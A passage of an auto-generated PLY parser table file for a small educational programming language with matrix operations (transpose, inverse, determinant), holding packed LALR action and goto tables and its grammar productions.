28,],[48,48,48,-77,-79,-71,-74,-70,-80,-73,-75,-72,48,-19,-76,48,48,-78,48,-20,-21,-82,-81,-102,-103,48,-116,-111,-105,-117,-118,-38,-112,-101,-104,48,-39,-119,-116,-68,-113,-65,48,-69,]),'MORETHAN':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,166,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'MINUS':([78,80,82,95,103,104,105,106,107,108,110,112,113,114,115,116,117,120,124,126,127,131,144,146,150,153,154,155,156,158,160,161,162,163,164,165,166,171,174,176,177,190,191,196,197,198,199,200,201,202,203,205,206,207,208,210,211,218,219,226,239,245,246,247,248,256,257,258,278,279,291,293,305,307,309,315,],[-152,-152,109,109,109,109,109,-149,-157,-139,-158,-140,-151,-151,-151,109,-150,-146,-152,109,-152,109,-151,-150,197,-141,-155,-156,-154,-153,-152,-152,-152,-152,109,-152,-152,109,109,109,109,-156,109,-152,-152,-148,-147,-152,-142,-152,-145,-133,-130,-131,-128,-132,-129,-109,-150,-150,109,109,109,109,109,109,-98,-153,-144,-143,109,109,-100,109,109,-99,]),'DIVIDE':([106,107,110,112,113,114,115,117,120,144,146,153,154,155,156,158,190,198,199,203,218,219,226,257,258,305,315,],[-149,-157,-158,-140,-151,-151,-151,-150,-146,-151,-150,200,-155,-156,-154,-153,-156,-148,-147,-145,-109,-150,-150,-98,-153,-100,-99,]),'RCORCH':([70,106,107,108,110,112,113,114,115,117,120,150,153,154,155,156,158,173,179,195,198,199,201,203,213,218,257,276,277,278,279,287,302,305,315,],[94,-149,-157,-139,-158,-140,-151,-151,-151,-150,-146,-135,-141,-155,-156,-154,-153,218,230,-136,-148,-147,-142,-145,252,-109,-98,-137,-138,-144,-143,305,313,-100,-99,]),'DETERMINANT':([219,258,],[-150,288,]),'RPAREN':([17,35,43,44,74,101,106,107,108,110,112,113,114,115,117,118,119,120,142,144,145,146,147,148,150,153,154,155,156,157,158,170,176,178,188,190,195,198,199,201,203,209,215,218,224,225,226,
227,228,240,241,251,257,262,263,264,273,276,277,278,279,291,292,293,305,306,307,308,315,316,317,],[29,42,73,-58,-59,-56,-149,-157,-139,-158,-140,-151,-151,-151,-150,159,-126,-146,-60,-151,-121,-150,192,193,-135,-141,-155,-156,-154,203,-153,-150,-60,229,-57,-122,-136,-148,-147,-142,-145,-134,254,-109,-89,-95,-97,-96,265,-123,-125,-127,-98,291,-96,-93,-124,-137,-138,-144,-143,-87,-91,-60,-100,-86,-60,-94,-99,-92,321,]),'SEMICOLON':([33,34,59,65,71,76,93,94,106,107,108,110,112,113,114,115,117,119,120,121,122,125,128,135,143,149,150,153,154,155,156,158,169,172,175,180,181,189,192,193,194,195,198,199,201,203,209,216,218,219,220,221,222,230,242,243,251,252,253,254,257,258,259,260,276,277,278,279,285,286,288,291,296,305,306,313,314,315,320,325,],[39,-9,89,-85,-10,89,132,-11,-149,-157,-139,-158,-140,-151,-151,-151,-150,-126,-146,167,-28,-83,-84,-54,-110,-110,-135,-141,-155,-156,-154,-153,-22,217,223,-12,231,238,-120,-120,244,-136,-148,-147,-142,-145,-134,255,-109,-150,-110,-110,261,-13,274,275,-127,-29,-23,-120,-98,-153,289,290,-137,-138,-144,-143,-24,304,-106,-87,-14,-100,-86,-30,-25,-99,-26,-27,]),'LOWERTHAN':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,163,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'LOWEREQUAL':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,165,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'TO':([265,],[294,]),'COLON':([3,],[4,]),'CTE_I':([40,78,80,82,95,103,104,105,109,111,116,124,126,127,131,133,151,152,160,161,162,163,164,165,166,168,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,239,245,246,247,
248,256,284,291,293,307,309,],[70,-152,-152,115,115,115,115,115,-152,-152,115,-152,115,-152,115,179,115,115,-152,-152,-152,-152,115,-152,-152,213,115,115,115,115,115,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,115,115,115,115,115,115,302,115,115,115,115,]),'CTE_F':([78,80,82,95,103,104,105,109,111,116,124,126,127,131,151,152,160,161,162,163,164,165,166,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,239,245,246,247,248,256,291,293,307,309,],[-152,-152,113,113,113,113,113,-152,-152,113,-152,113,-152,113,113,113,-152,-152,-152,-152,113,-152,-152,113,113,113,113,113,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,113,113,113,113,113,113,113,113,113,113,]),'PLUS':([78,80,82,95,103,104,105,106,107,108,110,112,113,114,115,116,117,120,124,126,127,131,144,146,150,153,154,155,156,158,160,161,162,163,164,165,166,171,174,176,177,190,191,196,197,198,199,200,201,202,203,205,206,207,208,210,211,218,219,226,239,245,246,247,248,256,257,258,278,279,291,293,305,307,309,315,],[-152,-152,111,111,111,111,111,-149,-157,-139,-158,-140,-151,-151,-151,111,-150,-146,-152,111,-152,111,-151,-150,196,-141,-155,-156,-154,-153,-152,-152,-152,-152,111,-152,-152,111,111,111,111,-156,111,-152,-152,-148,-147,-152,-142,-152,-145,-133,-130,-131,-128,-132,-129,-109,-150,-150,111,111,111,111,111,111,-98,-153,-144,-143,111,111,-100,111,111,-99,]),'$end':([1,8,18,20,21,30,31,32,38,88,92,102,],[0,-5,-5,-4,-5,-3,-5,-2,-1,-17,-15,-16,]),'FUNCTION':([4,7,26,39,69,137,183,184,186,232,234,236,237,268,270,272,298,],[5,5,-6,-7,-8,-55,5,-55,-55,-55,5,5,-55,5,-55,5,5,]),'DIFFERENT':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,161,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'RBRACE':([50,52,53,54,58,59,61,62,64,66,67,68,72,77,81,89,97,98,99,100,106,107,108,110,112,113,114,11
5,117,119,120,132,136,138,140,141,150,153,154,155,156,158,182,185,187,195,198,199,201,203,209,217,218,223,231,235,238,244,249,250,251,255,257,261,274,275,276,277,278,279,280,281,282,289,290,291,300,304,305,306,310,312,315,318,319,322,327,328,],[-63,-77,-79,-71,-74,88,-70,-80,92,-73,-75,-72,-60,102,-64,-76,137,-53,-60,-60,-149,-157,-139,-158,-140,-151,-151,-151,-150,-126,-146,-78,-60,184,186,-60,-135,-141,-155,-156,-154,-153,232,-60,237,-136,-148,-147,-142,-145,-134,-82,-109,-81,-52,270,-102,-103,280,-116,-127,-111,-98,-105,-117,-118,-137,-138,-144,-143,-38,300,-112,-101,-104,-87,-39,-119,-100,-86,318,-116,-99,-68,-113,-65,328,-69,]),'DOUBLEEQUAL':([57,75,86,106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-150,-150,124,-149,-157,-139,-158,-140,-151,-151,-151,-150,162,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'INVERSA':([57,75,86,],[-150,-150,125,]),'TIMES':([106,107,110,112,113,114,115,117,120,144,146,153,154,155,156,158,190,198,199,203,218,219,226,257,258,305,315,],[-149,-157,-158,-140,-151,-151,-151,-150,-146,-151,-150,202,-155,-156,-154,-153,-156,-148,-147,-145,-109,-150,-150,-98,-153,-100,-99,]),'LPAREN':([6,11,27,28,36,48,51,56,57,60,63,75,78,79,80,82,85,87,91,95,103,104,105,116,124,126,127,129,131,146,160,161,162,163,164,165,166,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,219,239,245,246,247,248,256,291,293,294,307,309,],[17,-18,35,-61,-62,-152,82,-152,-88,90,-66,-88,-152,104,-152,116,123,-90,131,116,116,116,116,116,-152,116,-152,176,116,-88,-152,-152,-152,-152,116,-152,-152,116,116,116,116,116,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,-88,116,116,116,116,116,116,116,116,309,116,116,]),'COMA':([34,74,94,101,106,107,108,110,112,113,114,115,117,119,120,122,144,145,146,150,153,154,155,156,158,169,190,195,198,199,201,203,209,218,226,227,230,251,252,257,263,264,276,2
77,278,279,285,292,305,313,315,320,],[41,-59,134,142,-149,-157,-139,-158,-140,-151,-151,-151,-150,-126,-146,-28,-151,191,-150,-135,-141,-155,-156,-154,-153,214,239,-136,-148,-147,-142,-145,-134,-109,-97,-96,267,-127,-29,-98,-96,293,-137,-138,-144,-143,303,307,-100,-30,-99,323,]),'INPUT':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[56,56,56,-77,-79,-71,-74,-70,-80,-73,-75,-72,56,-19,-76,56,56,-78,56,-20,-21,-82,-81,-102,-103,56,-116,-111,-105,-117,-118,-38,-112,-101,-104,56,-39,-119,-116,-68,-113,-65,56,-69,]),'ELSE':([250,280,300,],[283,-38,-39,]),'ID':([2,12,13,14,15,16,22,23,24,25,37,41,45,46,50,52,53,54,58,61,62,66,67,68,72,78,80,82,83,84,89,90,95,96,100,103,104,105,109,111,116,123,124,126,127,131,132,134,139,151,152,160,161,162,163,164,165,166,167,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,212,214,217,223,238,239,244,245,246,247,248,249,250,255,256,261,267,274,275,280,282,289,290,291,293,295,300,303,304,307,309,312,318,319,322,323,326,328,],[3,-34,-37,-35,-36,28,34,-31,-32,-33,57,34,74,75,75,-77,-79,-71,-74,-70,-80,-73,-75,-72,75,-152,-152,117,122,-19,-76,130,117,75,75,117,146,117,-152,-152,117,170,-152,117,-152,117,-78,34,75,117,117,-152,-152,-152,-152,117,-152,-152,-20,117,219,226,117,146,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,-21,122,-82,-81,-102,146,-103,117,117,117,117,75,-116,-111,117,-105,34,-117,-118,-38,-112,-101,-104,117,226,75,-39,122,-119,226,117,-116,-68,-113,-65,122,75,-69,]),'IF':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[51,51,51,-77,-79,-71,-74,-70,-80,-73,-75,-72,51,-19,-76,51,51,-78,51,-20,-21,-82,-81,-102,-103,51,-116,-111,-105,-117,-118,-38,-112,-101,-104,51,-39,-119,-116,-68,-113,-65,51,-69,]),'LBRACE':([29,42,73,159,204,229,266,283,301,324,],[37,72,100,-114,249,-67,295,-115,
249,326,]),'FROM':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[60,60,60,-77,-79,-71,-74,-70,-80,-73,-75,-72,60,-19,-76,60,60,-78,60,-20,-21,-82,-81,-102,-103,60,-116,-111,-105,-117,-118,-38,-112,-101,-104,60,-39,-119,-116,-68,-113,-65,60,-69,]),'INT':([5,10,35,39,55,142,167,],[12,23,23,23,23,23,23,]),'FLOAT':([5,10,35,39,55,142,167,],[14,24,24,24,24,24,24,]),'BREAK':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[65,65,65,-77,-79,-71,-74,-70,-80,-73,-75,-72,65,-19,-76,65,65,-78,65,-20,-21,-82,-81,-102,-103,65,-116,-111,-105,-117,-118,-38,-112,-101,-104,65,-39,-119,-116,-68,-113,-65,65,-69,]),'TRANSPUESTA':([57,75,86,],[-150,-150,128,]),'MAIN':([4,7,9,19,26,39,69,137,183,184,186,232,233,234,236,237,268,269,270,271,272,297,298,299,311,],[11,11,11,11,-6,-7,-8,-55,-40,-55,-55,-55,-42,-44,-46,-55,-41,-45,-55,-50,-47,-43,-49,-48,-51,]),}
# NOTE: this file is PLY-generated; edits are lost on regeneration.
# Expand the packed {token: (state_list, action_list)} pairs into the
# nested state -> token -> action table the LALR parser reads, then
# drop the packed form to free memory.
_lr_action = {}
for _k, _v in _lr_action_items.items():
    for _x, _y in zip(*_v):
        _lr_action.setdefault(_x, {})[_k] = _y
del _lr_action_items
_lr_goto_items = {'creaTrans':([128,],[175,]),'creaCuadReturn':([135,],[181,]),'quad_fact':([112,],[153,]),'creaInversa':([125,],[172,]),'vars':([37,72,100,],[46,96,139,]),'condFinal':([250,312,],[282,319,]),'paramFuncion':([176,293,307,],[224,308,316,]),'push_function':([28,],[36,]),'push_arreglo':([252,],[285,]),'endProc':([137,184,186,232,237,270,],[183,234,236,268,272,298,]),'var_cte':([82,95,103,104,105,116,126,131,151,152,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[106,106,106,106,106,106,106,106,198,199,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,]),'while3':([318,],[322,]),'arreglo':([37,46,50,72,82,95,96,100,103,104,105,116,126,131,139,151,152,164,171,174,176,177,191,239,245,246,247,248,249,256,291,293,295,307,309,326,],[47,47,47,47,107,107,47,47,107,107,107,107,107,107,47,107,107,107,107,107,107,107,107,107,107,107,107,107,47,107,107,107,47,107,107,47,]),'nomMain':([4,7,9,19,],[6,6,6,6,]),'cond':([159,],[204,]),'termino':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[108,108,108,108,108,108,108,108,108,108,108,108,108,108,108,108,108,278,279,108,108,108,108,108,]),'create_asign':([143,149,220,221,],[189,194,259,260,]),'tipoFunc':([5,],[16,]),'bloque':([204,301,],[250,312,]),'push_id':([57,75,117,146,170,219,226,],[86,86,158,158,215,258,158,]),'quad_print':([192,193,254,],[242,243,286,]),'varsGlobal':([4,],[7,]),'matrix':([37,46,50,72,82,95,96,100,103,104,105,116,126,131,139,151,152,164,171,174,176,177,191,239,245,246,247,248,249,256,291,293,295,307,309,326,],[49,49,49,49,110,110,49,49,110,110,110,110,110,110,49,110,110,110,110,110,110,110,110,110,110,110,110,110,49,110,110,110,49,110,110,49,]),'tipo':([10,35,39,55,142,167,],[22,45,22,83,45,83,]),'inversa':([37,46,50,72,96,100,139,249,295,326,],[62,62,62,62,62,62,62,62,62,62,]),'exp1':([150,],[195,]),'estatuto':([37,46,50,72,96,100,139,249,295,326,],[50,50,50,50,50,50,50,50,50,50,]),'determinante':([174,],[222,]),
'param':([35,142,],[43,188,]),'varAux2':([83,214,303,323,],[121,253,314,325,]),'varAuxGlobal2':([22,41,134,267,],[33,71,180,296,]),'varAuxGlobal1':([10,39,],[26,69,]),'program':([0,],[1,]),'functionReturn':([72,99,100,136,141,185,],[97,138,140,182,187,235,]),'varAux1':([55,167,],[84,212,]),'paramAvarTable':([74,],[101,]),'main':([4,7,9,19,],[8,18,21,31,]),'lectura':([37,46,50,72,96,100,139,249,295,326,],[52,52,52,52,52,52,52,52,52,52,]),'empty':([35,72,99,100,136,141,142,176,185,293,307,],[44,98,98,98,98,98,44,225,98,225,225,]),'function':([4,7,183,234,236,268,272,298,],[9,19,233,269,271,297,299,311,]),'escrituraAux':([104,191,239,],[147,240,273,]),'push_poper':([48,56,78,80,109,111,124,127,160,161,162,163,165,166,196,197,200,202,],[79,85,103,105,151,152,171,174,205,206,207,208,210,211,245,246,247,248,]),'push_var':([122,],[169,]),'gosub':([224,],[262,]),'ver_dim2':([305,],[315,]),'comp':([119,],[164,]),'factor':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,]),'actualizaFuncion':([57,75,146,219,],[87,87,87,87,]),'transpuesta':([37,46,50,72,96,100,139,249,295,326,],[53,53,53,53,53,53,53,53,53,53,]),'condElse':([283,],[301,]),'condicion':([37,46,50,72,96,100,139,249,295,326,],[54,54,54,54,54,54,54,54,54,54,]),'quad_term':([108,],[150,]),'push_cte':([113,114,115,144,],[154,155,156,190,]),'quad_comp':([209,],[251,]),'generarEra':([87,],[129,]),'loopFromDo':([37,46,50,72,96,100,139,249,295,326,],[58,58,58,58,58,58,58,58,58,58,]),'expresion':([82,104,116,131,171,174,177,191,239,291,309,],[118,145,157,178,216,220,228,145,145,306,317,]),'endPrograma':([8,18,21,31,],[20,30,32,38,]),'llamadaAFuncion':([37,46,50,72,96,100,104,139,174,191,239,249,295,326,],[59,76,76,76,76,76,148,76,221,241,241,76,76,76,]),'push_matriz':([313,],[320,]),'asignacion':([37,46,50,72,96,100,139,249,295,326,],[61,61,61,61,61,61,61,61,61,61,]),'while2':([2
29,],[266,]),'generaCuadbreak':([65,],[93,]),'while1':([63,],[91,]),'push_id2':([226,],[263,]),'bloqueAux':([37,46,50,72,96,100,139,249,295,326,],[64,77,81,99,136,141,185,281,310,327,]),'ver_dim1':([218,],[257,]),'while':([37,46,50,72,96,100,139,249,295,326,],[66,66,66,66,66,66,66,66,66,66,]),'termino1':([153,],[201,]),'exp':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,256,291,293,307,309,],[119,135,143,119,149,119,173,119,209,119,119,227,119,119,119,276,277,287,119,227,227,119,]),'nomFunc':([16,],[27,]),'factorAux':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,]),'comparacion':([37,46,50,72,96,100,139,249,295,326,],[67,67,67,67,67,67,67,67,67,67,]),'paramFuncionAux':([227,263,],[264,292,]),'escritura':([37,46,50,72,96,100,139,249,295,326,],[68,68,68,68,68,68,68,68,68,68,]),}
# NOTE: this file is PLY-generated; edits are lost on regeneration.
# Same expansion as the action table: unpack {nonterminal: (states,
# gotos)} into state -> nonterminal -> goto-state, then discard the
# packed source.
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
    for _x, _y in zip(*_v):
        _lr_goto.setdefault(_x, {})[_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> program","S'",1,None,None,None),
('program -> PROGRAM ID COLON varsGlobal function main endPrograma','program',7,'p_program','lexAndSyn.py',144),
('program -> PROGRAM ID COLON function main endPrograma','program',6,'p_program','lexAndSyn.py',145),
('program -> PROGRAM ID COLON varsGlobal main endPrograma','program',6,'p_program','lexAndSyn.py',146),
('program -> PROGRAM ID COLON main endPrograma','program',5,'p_program','lexAndSyn.py',147),
('endPrograma -> <empty>','endPrograma',0,'p_endPrograma','lexAndSyn.py',153),
('varsGlobal -> VAR varAuxGlobal1','varsGlobal',2,'p_varsGlobal','lexAndSyn.py',158),
('varAuxGlobal1 -> tipo varAuxGlobal2 SEMICOLON','varAuxGlobal1',3,'p_varAuxGlobal1','lexAndSyn.py',162),
('varAuxGlobal1 -> tipo varAuxGlobal2 SEMICOLON varAuxGlobal1','varAuxGlobal1',4,'p_varAuxGlobal1','lexAndSyn.py',163),
('varAuxGlobal2 -> ID','varAuxGlobal2',1,'p_varAuxGlobal2','lexAndSyn.py',167),
('varAuxGlobal2 -> ID COMA varAuxGlobal2','varAuxGlobal2',3,'p_varAuxGlobal2','lexAndSyn.py',168),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH','varAuxGlobal2',4,'p_varAuxGlobal2','lexAndSyn.py',169),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH COMA varAuxGlobal2','varAuxGlobal2',6,'p_varAuxGlobal2','lexAndSyn.py',170),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH','varAuxGlobal2',7,'p_varAuxGlobal2','lexAndSyn.py',171),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH COMA varAuxGlobal2','varAuxGlobal2',9,'p_varAuxGlobal2','lexAndSyn.py',172),
('main -> nomMain LPAREN RPAREN LBRACE bloqueAux RBRACE','main',6,'p_main','lexAndSyn.py',180),
('main -> nomMain LPAREN RPAREN LBRACE vars bloqueAux RBRACE','main',7,'p_main','lexAndSyn.py',181),
('main -> nomMain LPAREN RPAREN LBRACE llamadaAFuncion RBRACE','main',6,'p_main','lexAndSyn.py',182),
('nomMain -> MAIN','nomMain',1,'p_nomMain','lexAndSyn.py',186),
('vars -> VAR varAux1','vars',2,'p_vars','lexAndSyn.py',196),
('varAux1 -> tipo varAux2 SEMICOLON','varAux1',3,'p_varAux1','lexAndSyn.py',200),
('varAux1 -> tipo varAux2 SEMICOLON varAux1','varAux1',4,'p_varAux1','lexAndSyn.py',201),
('varAux2 -> ID push_var','varAux2',2,'p_varAux2','lexAndSyn.py',205),
('varAux2 -> ID push_var COMA varAux2','varAux2',4,'p_varAux2','lexAndSyn.py',206),
('varAux2 -> ID LCORCH CTE_I RCORCH push_arreglo','varAux2',5,'p_varAux2','lexAndSyn.py',207),
('varAux2 -> ID LCORCH CTE_I RCORCH push_arreglo COMA varAux2','varAux2',7,'p_varAux2','lexAndSyn.py',208),
('varAux2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz','varAux2',8,'p_varAux2','lexAndSyn.py',209),
('varAux2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz COMA varAux2','varAux2',10,'p_varAux2','lexAndSyn.py',210),
('push_var -> <empty>','push_var',0,'p_pushVariable','lexAndSyn.py',214),
('push_arreglo -> <empty>','push_arreglo',0,'p_arreglo','lexAndSyn.py',220),
('push_matriz -> <empty>','push_matriz',0,'p_matriz','lexAndSyn.py',231),
('tipo -> INT','tipo',1,'p_tipo','lexAndSyn.py',246),
('tipo -> FLOAT','tipo',1,'p_tipo','lexAndSyn.py',247),
('tipo -> CHAR','tipo',1,'p_tipo','lexAndSyn.py',248),
('tipoFunc -> INT','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',253),
('tipoFunc -> FLOAT','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',254),
('tipoFunc -> CHAR','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',255),
('tipoFunc -> VOID','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',256),
('bloque -> LBRACE RBRACE','bloque',2,'p_bloque','lexAndSyn.py',261),
('bloque -> LBRACE bloqueAux RBRACE','bloque',3,'p_bloque','lexAndSyn.py',262),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc','function',9,'p_function','lexAndSyn.py',268),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc','function',11,'p_function','lexAndSyn.py',269),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc function','function',10,'p_function','lexAndSyn.py',270),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc function','function',12,'p_function','lexAndSyn.py',271),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc','function',10,'p_function','lexAndSyn.py',272),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function','function',11,'p_function','lexAndSyn.py',273),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc','function',10,'p_function','lexAndSyn.py',274),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc','function',11,'p_function','lexAndSyn.py',275),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function','function',12,'p_function','lexAndSyn.py',276),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc','function',12,'p_function','lexAndSyn.py',277),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc function','function',11,'p_function','lexAndSyn.py',278),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc function','function',13,'p_function','lexAndSyn.py',279),
('functionReturn -> RETURN exp creaCuadReturn SEMICOLON','functionReturn',4,'p_functionReturn','lexAndSyn.py',283),
('functionReturn -> empty','functionReturn',1,'p_functionReturn','lexAndSyn.py',284),
('creaCuadReturn -> <empty>','creaCuadReturn',0,'p_creaCuadReturn','lexAndSyn.py',288),
('endProc -> <empty>','endProc',0,'p_endProc','lexAndSyn.py',293),
('param -> tipo ID paramAvarTable','param',3,'p_param','lexAndSyn.py',298),
('param -> tipo ID paramAvarTable COMA param','param',5,'p_param','lexAndSyn.py',299),
('param -> empty','param',1,'p_param','lexAndSyn.py',300),
('paramAvarTable -> <empty>','paramAvarTable',0,'p_paramAvarTable','lexAndSyn.py',305),
('empty -> <empty>','empty',0,'p_empty','lexAndSyn.py',311),
('push_function -> <empty>','push_function',0,'p_push_function','lexAndSyn.py',315),
('nomFunc -> ID push_function','nomFunc',2,'p_nomFunc','lexAndSyn.py',324),
('bloqueAux -> estatuto','bloqueAux',1,'p_bloqueAux','lexAndSyn.py',333),
('bloqueAux -> estatuto bloqueAux','bloqueAux',2,'p_bloqueAux','lexAndSyn.py',334),
('while -> WHILE while1 LPAREN expresion RPAREN while2 LBRACE bloqueAux RBRACE while3','while',10,'p_while','lexAndSyn.py',338),
('while1 -> <empty>','while1',0,'p_while1','lexAndSyn.py',342),
('while2 -> <empty>','while2',0,'p_while2','lexAndSyn.py',346),
('while3 -> <empty>','while3',0,'p_while3','lexAndSyn.py',350),
('loopFromDo -> FROM LPAREN ID EQUAL expresion RPAREN TO LPAREN expresion RPAREN DO LBRACE bloqueAux RBRACE','loopFromDo',14,'p_loopFromDo','lexAndSyn.py',354),
('estatuto -> asignacion','estatuto',1,'p_estatuto','lexAndSyn.py',366),
('estatuto -> condicion','estatuto',1,'p_estatuto','lexAndSyn.py',367),
('estatuto -> escritura','estatuto',1,'p_estatuto','lexAndSyn.py',368),
('estatuto -> while','estatuto',1,'p_estatuto','lexAndSyn.py',369),
('estatuto -> loopFromDo','estatuto',1,'p_estatuto','lexAndSyn.py',370),
('estatuto -> comparacion','estatuto',1,'p_estatuto','lexAndSyn.py',371),
('estatuto -> llamadaAFuncion SEMICOLON','estatuto',2,'p_estatuto','lexAndSyn.py',372),
('estatuto -> lectura','estatuto',1,'p_estatuto','lexAndSyn.py',373),
('estatuto -> BREAK generaCuadbreak SEMICOLON','estatuto',3,'p_estatuto','lexAndSyn.py',374),
('estatuto -> transpuesta','estatuto',1,'p_estatuto','lexAndSyn.py',375),
('estatuto -> inversa','estatuto',1,'p_estatuto','lexAndSyn.py',376),
('transpuesta -> ID push_id TRANSPUESTA creaTrans SEMICOLON','transpuesta',5,'p_transpuesta','lexAndSyn.py',380),
('inversa -> ID push_id INVERSA creaInversa SEMICOLON','inversa',5,'p_inversa','lexAndSyn.py',383),
('creaInversa -> <empty>','creaInversa',0,'p_creaInversa','lexAndSyn.py',387),
('creaTrans -> <empty>','creaTrans',0,'p_creaTrans','lexAndSyn.py',391),
('generaCuadbreak -> <empty>','generaCuadbreak',0,'p_generaCuadbreak','lexAndSyn.py',395),
('llamadaAFuncion -> ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN expresion','llamadaAFuncion',8,'p_llamadaAFuncion','lexAndSyn.py',399),
('llamadaAFuncion -> ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN','llamadaAFuncion',7,'p_llamadaAFuncion','lexAndSyn.py',400),
('actualizaFuncion -> <empty>','actualizaFuncion',0,'p_actualizaFuncion','lexAndSyn.py',404),
('gosub -> <empty>','gosub',0,'p_gosub','lexAndSyn.py',409),
('generarEra -> <empty>','generarEra',0,'p_generarEra','lexAndSyn.py',421),
('paramFuncion -> ID push_id2 paramFuncionAux','paramFuncion',3,'p_paramFuncion','lexAndSyn.py',429),
('paramFuncion -> ID push_id2 paramFuncionAux COMA paramFuncion','paramFuncion',5,'p_paramFuncion','lexAndSyn.py',430),
('paramFuncion -> exp paramFuncionAux','paramFuncion',2,'p_paramFuncion','lexAndSyn.py',431),
('paramFuncion -> exp paramFuncionAux COMA paramFuncion','paramFuncion',4,'p_paramFuncion','lexAndSyn.py',432),
('paramFuncion -> empty','paramFuncion',1,'p_paramFuncion','lexAndSyn.py',433),
('paramFuncionAux -> <empty>','paramFuncionAux',0,'p_paramFuncionAux','lexAndSyn.py',437),
('push_id2 -> <empty>','push_id2',0,'p_push_id2','lexAndSyn.py',441),
('arreglo -> ID push_id LCORCH exp RCORCH ver_dim1','arreglo',6,'p_array','lexAndSyn.py',445),
('matrix -> ID push_id LCORCH exp RCORCH LCORCH exp RCORCH ver_dim2','matrix',9,'p_matrix','lexAndSyn.py',449),
